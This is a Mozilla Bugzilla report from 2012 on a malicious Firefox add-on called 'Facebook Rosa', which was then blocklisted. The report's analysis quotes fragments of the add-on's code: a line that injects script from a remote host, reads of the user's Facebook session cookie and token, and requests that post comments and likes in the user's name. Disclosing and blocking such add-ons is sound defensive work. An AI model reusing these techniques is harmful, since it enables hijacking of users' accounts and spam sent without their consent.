Bug 743484 - Malicious "Facebook Rosa" add-on
Status: RESOLVED FIXED
Product: Toolkit
Classification: Components
Component: Blocklisting
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-04-07 16:03 PDT by MarkH
Modified: 2016-03-07 15:30 PST


Attachments
20120407_rosathemenplus.zip (156.41 KB, application/octet-stream)
2012-04-07 16:03 PDT, MarkH

Description MarkH 2012-04-07 16:03:45 PDT
Created attachment 613147
20120407_rosathemenplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded add-on from http://rosathemenplus.com/plugin.xpi


Actual results:

Report for http://rosathemenplus.com/plugin.xpi

** Summary **

On install, it will begin programmatically sending spam to your Facebook friends and have you like pages, all without your knowledge or consent.

** Embedded and Remote Files **

lib.js
http://temasuperplugin.info?'+Math.random()
icon48.png
icon16.png
icon128.png
manifest.json


** Embedded Metadata **



** Files Loaded **



** Remote Javascript Loaded **

...(a=(b=document).createElement('script')).src='http://temasuperplugin.info?'+Math...
"description": "Verwandeln Sie Ihr Facebook in rosa!",
"content_scripts": [


** Facebook Paths Accessed **

... F
m"}9(3.2.4("o.5/b/a/q.6")!=-1||3.2.4("/b/a/s.6")!=-1){m.3.2=\'7://f.5/t.6?g
\'...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
"name": "Facebook: Rosa Themen-Plugin",
"description": "Verwandeln Sie Ihr Facebook in rosa!",


** Facebook Data Accessed **

var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
user_id = readCookie('c_user');


** HTTP Requests **

var c = new XMLHttpRequest();
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);


** All URLs Loaded or Mentioned **

...var blog = "http://rosaausgabepro.com/farbe/" +
randomFromTo(8601,8800) + ".php"...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
...document).createElement('script')).src='http://temasuperplugin.info?'+Math.rando...
"update_url": "http://rosaplugin.info/chrome.xml",




Expected results:

It should not post Facebook messages or like pages without your knowledge or consent.

Comment 1 Jorge Villalobos [:jorgev] 2012-04-09 10:12:51 PDT
ID: pink@rosaplugin.info

Comment 2 Jorge Villalobos [:jorgev] 2012-04-09 10:14:13 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i84

Comment 3 admin 2012-04-24 05:43:15 PDT
Hi, can you ban this spammer add-on too?
http://faceeklenti.com/
http://faceeklenti.com/firefox.php
http://faceeklenti.com/eklenti/facebook.xpi

You may not access the website by having a Turkish IP address.

You can try to access the site via http://www.gizlen.net/, a Turkish web-based proxy.

Comment 4 Jorge Villalobos [:jorgev] 2012-04-25 16:23:14 PDT
Please read the blocklisting guidelines (https://wiki.mozilla.org/Blocklisting) and file a new blocklist bug if you think it matches our requisites.
